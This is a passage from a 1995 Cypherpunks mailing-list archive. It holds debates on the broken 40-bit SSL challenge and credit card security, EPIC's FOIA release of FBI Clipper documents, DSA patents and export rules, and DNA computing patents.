Does anyone know if there have been any major developments in the DSA
patent issue in the past year?  I've read that some large companies have
used DSA in products without paying royalties to Bizdos, but they also have
separate licensing deals for RSA itself.

On another note, I would much appreciate advice on whether a product which
does only signature verification using, say, DSA and SHA, would require
ITAR export approval?  I've read that the NSA has specifically stated that
they are not concerned with products that cannot be easily used for privacy
-- so would such a product (which can verify but not generate signatures)
even be required to apply for an export license?

Doug Cutrell
doug@OpenMind.com

________________________________________________
fuck the Exxon Communications Decency amendment 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Wed, 16 Aug 95 12:59:15 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: FBI Files on Clipper Releas
Message-ID: <n1403533785.38465@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


FOR RELEASE:  August 16, 1995, 2:00 p.m. EST

CONTACT: David Sobel (202) 544-9240

               FBI FILES: CLIPPER MUST BE MANDATORY


	WASHINGTON, DC - Newly-released government documents show 
that key federal agencies concluded more than two years ago that 
the "Clipper Chip" encryption initiative will only succeed if 
alternative security techniques are outlawed.  The Electronic 
Privacy Information Center (EPIC) obtained the documents from the 
Federal Bureau of Investigation under the Freedom of Information 
Act.  EPIC, a non-profit research group, received hundreds of 
pages of material from FBI files concerning Clipper and 
cryptography.

	The conclusions contained in the documents appear to conflict 
with frequent Administration claims that use of Clipper technology 
will remain "voluntary."  Critics of the government's initiative, 
including EPIC, have long maintained that the Clipper "key-escrow 
encryption" technique would only serve its stated purpose if made 
mandatory.  According to the FBI documents, that view is shared by 
the Bureau, the National Security Agency (NSA) and the Department 
of Justice (DOJ).

	In a "briefing document" titled "Encryption: The Threat, 
Applications and Potential Solutions," and sent to the National 
Security Council in February 1993, the FBI, NSA and DOJ concluded 
that:

     Technical solutions, such as they are, will only work if 
     they are incorporated into *all* encryption products.  
     To ensure that this occurs, legislation mandating the 
     use of Government-approved encryption products or 
     adherence to Government encryption criteria is required.

	Likewise, an undated FBI report titled "Impact of Emerging 
Telecommunications Technologies on Law Enforcement" observes that 
"[a]lthough the export of encryption products by the United States 
is controlled, domestic use is not regulated."  The report 
concludes that "a national policy embodied in legislation is 
needed."  Such a policy, according to the FBI, must ensure "real-
time decryption by law enforcement" and "prohibit[] cryptography 
that cannot meet the Government standard."

	The FBI conclusions stand in stark contrast to public 
assurances that the government does not intend to prohibit the use 
of non-escrowed encryption.  Testifying before a Senate Judiciary 
Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
Harris asserted that:

     As the Administration has made clear on a number of 
     occasions, the key-escrow encryption initiative is a 
     voluntary one; we have absolutely no intention of 
     mandating private use of a particular kind of 
     cryptography, nor of criminalizing the private use of 
     certain kinds of cryptography.

 	According to EPIC Legal Counsel David Sobel, the newly-
disclosed information "demonstrates that the architects of the 
Clipper program -- NSA and the FBI -- have always recognized that 
key-escrow must eventually be mandated.  As privacy advocates and 
industry have always said, Clipper does nothing for law 
enforcement unless the alternatives are outlawed."

	Scanned images of several key documents are available via the 
World Wide Web at the EPIC Home Page:

		http://www.epic.org/crypto/ban/fbi_dox/



                              -30-



_________________________________________________________________________
Subject: FBI Files on Clipper Released
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Wed, 16 Aug 95 13:10:39 PDT
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
In-Reply-To: <199508161654.MAA25878@access5.digex.net>
Message-ID: <9508162008.AA00722@waller.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Peter Wayner writes:

| I don't think that there is any serious worry for Netscape. Their
| security is fine-- it's just crippled by the US Government. They
| could probably start distributing binary versions of their software
| that used full 128 bit keys in several hours. It's just that the
| Government gets pissed off about these things.

	I'm not sure I trust their security.  I know I have no reason
to; their server comes as 14.9mb of object code.  I know of no vendor
who ships a bug free 14mb product.  (To be more than fair, most of
those binaries are relatively small, on the order of 250k.)  As RTM,
Sr asked, if your programs are buggy, what does that say about their
security?

	(Not that I'm offering up exploits; simply saying that I
suspect there are problems, and that those problems can make whatever
security SSL does or doesn't offer moot).

	The operative question is not one of 'what is the cost of
breaking SSL relative to the financial gain?' but 'what is the cost of
breaking or bypassing SSL relative to the risk involved and the
financial gain?'

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Buck <jbuck@Synopsys.COM>
Date: Wed, 16 Aug 95 16:15:55 PDT
To: Damien.Doligez@inria.fr
Subject: Re: SSL challenge -- broken !
Message-ID: <199508162315.QAA04306@deerslayer.synopsys.com>
MIME-Version: 1.0
Content-Type: text/plain


Congratulations on demonstrating the effort required to break SSL with
a 40-bit key.  It seems clearly demonstrated that this is not adequate to
store, say, company-confidential information for communication over
insecure networks, since it seems the average grad student at a large
university could get access to similar computing power that you used
(spare cycles on a hundred workstations or more).

However, I disagree with your conclusion:

> Many people have access to the amount of computing power that I used.
> The exportable SSL protocol is supposed to be weak enough to be
> easily broken by governments, yet strong enough to resist the attempts
> of amateurs.  It fails on the second count.  Don't trust your credit
> card number to this protocol.

Your credit card number, expiration date, etc, are continually being
revealed to minimum-wage clerks all the time, unless you never use the
card.  A chain is only as strong as its weakest link; it makes no sense to
buy an expensive lock when your door has a big enough opening to climb
through.  Should some bad person get hold of your card number and misuse
it, you're not out any money: you just tell the card company "I didn't buy
that".  Since there's so much tracing in the system, if you buy a physical
something with a stolen credit card number it can usually be traced to you
(who'd they ship the package to?).  It's not clear to me that *any*
encryption is really essential if the only purpose is to protect credit
card #'s from snoopers.

There's plenty of stuff that *does* need protection, but I'm not sure
credit card #'s head the list.

Q: Of the 20,000 credit card #'s stolen from Netcom's computer, how many
were used to buy things?  Answer: not sure, but expect the answer is "zero".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 16 Aug 95 13:40:23 PDT
To: perry@piermont.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161832.OAA19556@frankenstein.piermont.com>
Message-ID: <199508162039.QAA27638@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> I haven't seen any news stories about this on the wire
> services. Someone would have to write a story about it first before
> people would know...

I've suggested this to a few reporters I know..

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 16 Aug 95 13:45:28 PDT
To: eb@comsec.com (Eric Blossom)
Subject: Re: Purple Boxes
In-Reply-To: <199508161935.MAA23741@comsec.com>
Message-ID: <9508162044.AA03254@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain




> 
> I've looked at the AT&T simultaneous voice and data stuff (VoiceSpan),
> and from what I can determine from reading between the lines, the
> voice stuff is not really digitized (a la PCM), rather it is just
> pushed around somewhere else in the spectrum.  The data is apparently
> modulated using a variant on QAM, and the data rate varies dynamically
> depending on whether or not you are saying anything.
> 
> As I recall the block diagram is ...

	We had a discussion about this on this list a while back.  I've
been following the matter elsewhere and it is certainly true that some
of the proprietary stuff and the proposed standard are fully digital
packet interleaved digital CLEP coded voice.

	It would be possible to use the echo cancelling technology of
modern modems (which subtract out the transmit signal to leave the receive)
to subtract out both the transmit and receive digital signals (QAM
by the way for v.32 and v.34) and leave just the residual noise which
could be voice at a very low level.  Whether one could get an adequate 
bit error rate (even with the trellis coding) from the far end data signal
given the worst case line loss if the signal was mixed with low level
voice I do not know.

	In any case if the analog voice under QAM data trick was
actually used, one could have a reasonable security analog masking type
scrambler for free by sending random digital data down the line in both
directions (such as data derived from Johnson noise or radioactive
decay).  There would be no easy way for a third party to filter out the
digital data (unless of course the interloper had a four wire tap on the
line with good enough directionality to demodulate the data in both
directions with a reasonable BER). 

							Dave Emery
							die@die.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 16 Aug 95 15:20:50 PDT
To: alan@tgc.com>
Subject: Erroneous HPCwire phone #
Message-ID: <v02120d01ac581e8fffdf@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Whoops...

Hope this helps!

Cheers,
Bob Hettinga


--- begin forwarded text

Date: Sat, 12 Aug 95 04:22:08 PST
From: "Alan Beck" <alan@tgc.com>
X-Minuet-Version: Minuet1.0_Beta_4
Reply-To: <alan@newsmaster.tgc.com>
X-Popmail-Charset: English
To: rah@shipwright.com
Subject: Erroneous HPCwire phone #

Robert,
    I can't reach my managing editor, who's a cypherpunk subscriber,
so I'm emailing you:  HPCwire's telephone number was posted
incorrectly.  Our real number is: 619-625-0070.  I'd appreciate
it if you could revise the post.  Thanks much!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Alan Beck                                                   HPCwire
Associate Editor                                   8445 Camino Santa Fe
HPCwire                                                      Suite 204
alan@hpcwire.tgc.com                          San Diego, Calif. 92121
Voice: 619/625-0070                                  Fax: 619/625-0088

    For a free trial subscription, email: <trial@hpcwire.tgc.com>

         ~~ Diagonally parked in a parallel universe. ~~

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 16 Aug 95 16:53:54 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <v0151010bac5841656d54@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger <perry@piermont.com> writes:
>Joe Buck writes:
>> However, I disagree with your conclusion:
>>
>> > Don't trust your credit card number to this protocol.
>>
>> Your credit card number, expiration date, etc, are continually being
>> revealed to minimum-wage clerks all the time, unless you never use the
>> card.
>
>On the other hand, those clerks can be traced down in most cases and
>have fairly limited numbers of cards they get. It might be very
>profitable to run a vacuum cleaner operation on the net slurping down
>credit card number or other confidential information and then selling
>it in bulk to people who could exploit it.

Most credit card companies ship their registration information off shore to
low tech developing countries. The idea is that the people entering the
information are unlikely to be able to exploit the information they are
exposed to.

Capturing a set of credit card tapes is certainly profitable, as would be
capturing large volumes of numbers, as you suggest. Now, are those West
African credit fraud rings dialing up DEC, SUN, and SGI? :-)

DJK

P.S. There could be an article in tomorrow's WSJ about the SSL Challenge.
The technical details and facts will surely be mangled. :-(







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 16 Aug 95 16:25:22 PDT
To: Joe Buck <jbuck@synopsys.com>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508162315.QAA04306@deerslayer.synopsys.com>
Message-ID: <199508162324.TAA00306@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Joe Buck writes:
> However, I disagree with your conclusion:
> 
> > Don't trust your credit card number to this protocol.
> 
> Your credit card number, expiration date, etc, are continually being
> revealed to minimum-wage clerks all the time, unless you never use the
> card. 

On the other hand, those clerks can be traced down in most cases and
have fairly limited numbers of cards they get. It might be very
profitable to run a vacuum cleaner operation on the net slurping down
credit card number or other confidential information and then selling
it in bulk to people who could exploit it.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Buck <jbuck@Synopsys.COM>
Date: Wed, 16 Aug 95 19:25:19 PDT
To: liberty@gate.net (Jim Ray)
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508170140.VAA40390@tequesta.gate.net>
Message-ID: <199508170224.TAA05372@deerslayer.synopsys.com>
MIME-Version: 1.0
Content-Type: text/plain



> >Your credit card number, expiration date, etc, are continually being
> >revealed to minimum-wage clerks all the time, unless you never use the
> >card.  A chain is only as strong as its weakest link; it makes no sense to
> >buy an expensive lock when your door has a big enough opening to climb
> >through.  Should some bad person get hold of your card number and misuse
> >it, you're not out any money: 
> 
> I'm not so sure....Checked the fees/interest lately?
> "There ain't no such thing as a free credit card theft."

Yes, it's true that this contributes to high interest rates (though
defaults cost more than fraud).

> >you just tell the card company "I didn't buy
> >that".  Since there's so much tracing in the system, if you buy a physical
> >something with a stolen credit card number it can usually be traced to you
> >(who'd they ship the package to?).  
> 
> They only *sometimes* find the person/loot.

Doesn't matter, this is a disincentive to theft and you are never liable
unless you lost your physical card.

> OK, but I had an idea a number of years ago. It's not too new,
> either, and considering the BILLION$ in credit-card fraud, I think
> the credit card companies could implement it with little trouble at
> every site the cards are used.

It would cost billions to get every single merchant that accepts credit
cards set up with PIN equipment.

> Why not PIN numbers. Banks and their
> customers are already used to them, they could be entered over the
> phone (I know, not too secure) or in person, and considering the
> dollar amount of the current fraud, they would be cheap (I think).
> [There is probably a flaw in my idea, but I haven't found it.]

You have to make sure the clerk that gets your order doesn't see the
PIN (so you need a secure path between you and your credit card co.
that avoids the merchant).  And what about the tellers?  Do you know
how badly they are treated?  They can get all those #'s.  Yes, it
can be done: ATMs are set up that way.  But as long as it's not done,
those who scream at the horrors of sending credit card #'s over the
net aren't thinking clearly.

Never forget that social engineering is the easiest hack.  Technical
solutions that ignore wide-open social engineering paths are worse
than useless (worse because they give an illusion of security).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Wed, 16 Aug 95 11:10:48 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508161810.AA05369@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Hal sez:
[..]
: I am a little alarmed by the suggestion that this news could have some
: marked impact on the Netscape stock price.  From our perspective this was
: certainly an unsurprising result (not to take anything away from Damien
: and others who worked on it).  It is a useful reminder that the things we
: work on here can have profound consequences.

Just too bad Ecash and the ON-Line Stock/Options Broker [TM] aren't available,
would be a good time to buy some put options on Netscape Communications.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 16 Aug 95 17:22:17 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI Files on Clipper Release
In-Reply-To: <n1403533785.38465@epic.org>
Message-ID: <9508170022.AA19096@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dave Banisar quotes FBI documents obtained via the FOIA:
>      Technical solutions, such as they are, will only work if 
>      they are incorporated into *all* encryption products.  
>      To ensure that this occurs, legislation mandating the 
>      use of Government-approved encryption products or 
>      adherence to Government encryption criteria is required.

...meanwhile...
> Testifying before a Senate Judiciary 
> Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
> Harris asserted that:
> 
>      As the Administration has made clear on a number of 
>      occasions, the key-escrow encryption initiative is a 
>      voluntary one; we have absolutely no intention of 
>      mandating private use of a particular kind of 
>      cryptography, nor of criminalizing the private use of 
>      certain kinds of cryptography.

By exactly what mechanism are appointed (hired ?) officials such as AAG Harris
supposedly accountable to the public ?  Can they be brought up on perjury
charges ?  Just what real legal recourse do we have against lying scum in the
bureaucracy ?  Are we stuck unless we can get some Congresscritter to cry
foul on the floor of the House or Senate ?

-Futplex <futplex@pseudonym.com>
"you said too much; and what you said, it was a lie" -EMF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Wed, 16 Aug 95 21:04:04 PDT
To: pcw@access.digex.net
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <9508170403.AA20845@pepper.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain


jweis wrote: 
> I have to agree, Netscape may spend some energy to upgrade their 
> encryption, but it really won't buy them all that much.   SSL, to me, is 
> like using a "security envelope" to mail cash or putting the club on your 
> car.  It presents just enough of an obstacle to keep honest people honest.

This is the problem of using "physical" world analogies with the network.
A similar argument that is posited is that "Sure it's not 100% secure but
it's better than the carbons from a receipt (now gone) or people who
don't shred their garbage." I respond that the network isn't the "real"
world so the laws of physics don't apply. Someone in Boston MA is unlikely
to fly into Sunnyvale to paw through my garbage, but it would be "trivial"
for them to see my receipt go flashing by and throw some spare compute
cycles at breaking it. A snooper/cracker program on a "spare" machine
might yield a half dozen credit cards a week. 

I prefer the attitude of better vigilance through layered encryption. That
is the transaction might be 40-bit RC4 but the "jewels" (otherwise known
as the credit authorization information) should be DES3. 

--Chuck

Just my opinion of course.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 16 Aug 95 18:33:35 PDT
To: cypherpunks@toad.com
Subject: genetic software patents (fwd)
Message-ID: <Pine.SOL.3.91.950816212608.27837F-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
 
     Sometime ago, I reported on a recent discovery of how gene sequences
can be used for mathematical optimization calculations.  The method,
developed by Leonard Adleman (the "A" of RSA) provided a way of solving
the Traveling Salesman Problem using gene sequences (interestingly, the
paper by Hopfield that kicked off the neural network revival also solved
the TSP).  Computable genes blur even more hardware and software (along
with hardware/software codesign tools), but has yet to sink into PTO
statutory and prior art thinking.

    In any event, the August 1995 issue of Dr. Dobb's Journal, page 127,
has a nicely illustrated article titled "Biochemical techniques take on
combinatorial problems".  If you or your clients are interested in this
new form of computing, get a copy of the article.  Adleman's original paper was
titled "Molecular Computation of Solutions to Combinatorial Problems" and
was in the November 11, 1994 issue of Science.

    While you are at it, get a copy of an article that appeared in the
July 27, 1995 issue of Nature, page 307, titled "Protein molecules as
computational elements in living cells".  It starts out "Many proteins in
living cells appear to have as their primary function the transfer and
processing of information, rather than chemical transformation of metabolic
intermediates or the building of cellular structures".  Yet one more blur
of "hardware" and "software".  Geneware?

    A final article to get is "Circuit simulation of genetic networks",
appearing in the August 4, 1995 issue of Science, page 650.  It proposes
to simulate genetic networks (such as the bacteriophage lambda lysis-lysogeny
decision circuit) using the tools found in hardware/software codesign tools.
With VHDL as a digital circuit language, and AHDL as an analog circuit language,
are we going to need GHDL as a genetic circuit language?

    It is not hard to imagine in the future some VHDL code being mapped into
software with standard translators, into hardware using cell libraries, and
into gene sequences using sequence libraries interfaced to EDA design tools.
Properly structured sets of claims under the Doctrine of Equivalents could
claim coverage in all types of domains (in fact, the claims could be generated
by the design tool itself using a "cell" library of claim clauses).
Alternatively entire libraries of medical journals suddenly become potential
software/hardware prior art.



     While practical use of the gene technique is years off, it does raise
the issue of how the PTO is going to handle the prior art aspects, when
gene technology now becomes software and hardware prior art (as soon as, if
ever, the PTO first solves the software-software prior art problem, and then
the software/hardware codesign prior art problem).  Scientists are blurring
the lines of computing much faster than the PTO can respond; for example, the
proposed software patent guidelines reflect none of the above developments.

     Together these three papers represent the cutting edge of issues
that will be affecting the patenting world in the years to come. Read them
now to get a jump.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 16 Aug 95 18:42:29 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI Files on Clipper Release
Message-ID: <199508170140.VAA22967@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Futplex <futplex@pseudonym.com> writes:

<FBI document excerpt obtained through FOIA snipped>

>...meanwhile...

<Directly contrary Senate Judiciary Subcommittee testimony
by Assistant Attorney General Jo Ann Harris also snipped>

>By exactly what mechanism are appointed (hired ?) officials such
>as AAG Harris supposedly accountable to the public ?  

Supposedly, the congressional pur$e-$trings...
[I doubt the "reformers" will exercise this power.]

>Can they be brought up on perjury charges ?  

[I *wish* but...] doubtful, our best hope is the media.

>Just what real legal recourse do we have against lying
>scum in the bureaucracy ?

I have mass-forwarded Dave Banisar's post to all the media
e-mail addresses I have. I suggest that everyone on the list
do this too. [Isn't e-mail wonderful?  :) ] I also e-mailed
the government asking which position was the lie, but I don't
expect a response.

>Are we stuck unless we can get some Congresscritter to cry
>foul on the floor of the House or Senate ?

Yup. I'm afraid our best hope [aside from the media]
is Congressman Traficant and his ilk.  ;-)

<snip>

>"you said too much; and what you said, it was a lie" -EMF

When combined with PRZ's award today, I feel this obvious
lie could be a blessing in disguise for us privacy lovers.
I say this in view of the timing of the upcoming political 
season, but everyone here already knows that I only trust
one kind of candidate to tell us the truth.
Now they know why...
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDKYp21lp8bpvW01AQFVggP+PqD6KaxwTYLogOaPC4G7nEzqfnR7sfyc
SXQx4rQFt+HoaDbo89k75jh8BcfCwmZNEXsmbIz7ilyiIcnwhLDLL+sL+ZPie25W
autacym9+MXjrkQUu12qNxQ+XKH0y+TR/mMCGIUVxtpyT5QMPVtAptS1DScoJx0U
0LmFsuSM+Z8=
=C1JX
-----END PGP SIGNATURE-----
Regards, Jim Ray

Don't investigate Mena, Arkansas and contra-coke. 
Embarrassment is a threat to national security...
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 16 Aug 95 18:42:35 PDT
To: jbuck@Synopsys.COM
Subject: Re: SSL challenge -- broken !
Message-ID: <199508170140.VAA40390@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Joe Buck writes:

<snip>

>Your credit card number, expiration date, etc, are continually being
>revealed to minimum-wage clerks all the time, unless you never use the
>card.  A chain is only as strong as its weakest link; it makes no sense to
>buy an expensive lock when your door has a big enough opening to climb
>through.  Should some bad person get hold of your card number and misuse
>it, you're not out any money: 

I'm not so sure....Checked the fees/interest lately?
"There ain't no such thing as a free credit card theft."
[Apologies to Milton & Rose Friedman.] ;)

>you just tell the card company "I didn't buy
>that".  Since there's so much tracing in the system, if you buy a physical
>something with a stolen credit card number it can usually be traced to you
>(who'd they ship the package to?).  

They only *sometimes* find the person/loot.

>It's not clear to me that *any*
>encryption is really essential if the only purpose is to protect credit
>card #'s from snoopers.

OK, but I had an idea a number of years ago. It's not too new,
either, and considering the BILLION$ in credit-card fraud, I think
the credit card companies could implement it with little trouble at
every site the cards are used. Why not PIN numbers. Banks and their
customers are already used to them, they could be entered over the
phone (I know, not too secure) or in person, and considering the
dollar amount of the current fraud, they would be cheap (I think).
[There is probably a flaw in my idea, but I haven't found it.]

<snip>

>Q: Of the 20,000 credit card #'s stolen from Netcom's computer, how many
>were used to buy things?  Answer: not sure, but expect the answer is "zero".

Probably so, but imagine being a Netcom customer 
(or a Netcom stockholder).
Not all of the costs of crime are monetary.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDKdH21lp8bpvW01AQGBTwP/VQ7BNPAAna6ba3avp+y9us0E5hhpUGdJ
6shHmZjPDWrSZz9aGzq5xhkQzSKdlLy/lFePt8acFBbDaGnK8wzAvoo1S69mr4bA
AUJ+IsI5j/Ctvic0RGbiIlfy+thXna6iwTgDovBB7u311+UMCgMg0A89onIjWCQQ
jKN2sSimEHg=
=0TzV
-----END PGP SIGNATURE-----
Regards, Jim Ray

Don't investigate Mena, Arkansas and contra-coke. 
Embarrassment is a threat to national security...
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 16 Aug 95 21:51:45 PDT
To: cypherpunks@toad.com
Subject: ELINT easier than HUMINT
Message-ID: <ac58168f0b02100478b5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've deleted the other list that was cc:ed here....)

At 4:03 AM 8/17/95, Chuck McManis wrote:

>This is the problem of using "physical" world analogies with the network.
>A similar argument that is posited is that "Sure it's not 100% secure but
>it's better than the carbons from a receipt (now gone) or people who
>don't shred their garbage." I respond that the network isn't the "real"
>world so the laws of physics don't apply. Someone in Boston MA is unlikely
>to fly into Sunnyvale to paw through my garbage, but it would be "trivial"
>for them to see my receipt go flashing by and throw some spare compute
>cycles at breaking it. A snooper/cracker program on a "spare" machine
>might yield a half dozen credit cards a week.

I agree. This has direct parallels to "physical eavesdropping" vs.
"electronic eavesdropping." After all, one might argue, why bother with
encrypting phone conversations when a physical bug could pick up the audio?


As Whit Diffie has noted, the difference is one of ease of use. It is hard
to plant physical bugs...and expensive, prone to error, etc. It would also
be pretty obvious, eventually, if every office in a building were
physically bugged, but it would be almost undetectable if the Northern
Telecom PBX box in the basement was being tapped on the way out. Crypto
with back doors is even easier for the wiretapper.

Electronic surveillance and related technologies (packet sniffers are a
form of surveillance) are cheap by comparison to physical surveillance. And
the concentration of communication lines and systems makes ELINT and COMINT
much cheaper _per target_ than HUMINT.

Now I don't personally worry too much at this time about giving my VISA
number over the phone, or even over the Net...I can always deny making an
authorization and the CC companies will not charge me (assuming the goods
ordered were not also shipped to my address).

But the future lies with protecting electronic transactions against
surveillance. The breaking of SSL in Netscape is not terribly important in
and of itself, given the government-imposed limits on key size, and given
the sorts of things now being encrypted (like VISA numbers). It gets more
important as the types of things encrypted become more serious.

At least now we know how people were "vanished" in that recent movie.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Wed, 16 Aug 95 22:18:01 PDT
To: Jason Weisberger <jweis@primenet.com>
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <v03002b05ac587f94b403@[204.118.88.53]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:32 AM 8/16/95, Jason Weisberger wrote:
>like using a "security envelope" to mail cash or putting the club on your
>car.  It presents just enough of an obstacle to keep honest people honest.

        As the Mitnick experience shows, the vulnerability of the
providers' host systems is a concern not addressed by link-oriented schemes
such as SSL.  Longer keys for SSL would not have improved the protection on
the 30,000 credit card numbers he stole.

d/

--------------------
Dave Crocker                                                +1 408 246 8253
Brandenburg Consulting                                fax:  +1 408 249 6205
675 Spruce Dr.                                       page:  +1 408 581 1174
Sunnyvale, CA  94086 USA                           dcrocker@brandenburg.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 16 Aug 95 20:38:10 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Randal Schwartz Petition
Message-ID: <Pine.ULT.3.91.950816223529.1576A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I hate to do this, but for any of you that have been following the Randal
Schwartz (of Perl fame) fiasco, there is now a URL with information about
collecting petition signatures and letters of support for the sentencing
judge. 

The URL is found at http://www.ugcs.caltech.edu/~kluster/petition.html/

Personally, I think it's ridiculous all the crap that went into this 
conviction, but that's just my personal opinion.  This probably isn't the 
correct place to discuss it, but misc.legal.computing has taken it up.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDKdnDokqlyVGmCFAQGUNgP+NgqXU3p7Pb0vXYMb9gBiqDzGcIYeXdLG
KfhmbTG0mOaVvcWzrrD7oEkdTXiPUhtzOknWH4C6OalSV54JwYGVEueOPfpeztBG
2u0izzyTX1UB2cCb352PxstpwSkrFoQHUqVCDRpHZcSNcTwfrS3vmYK5fLE5VY6n
203SEqfYupA=
=Q4x2
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
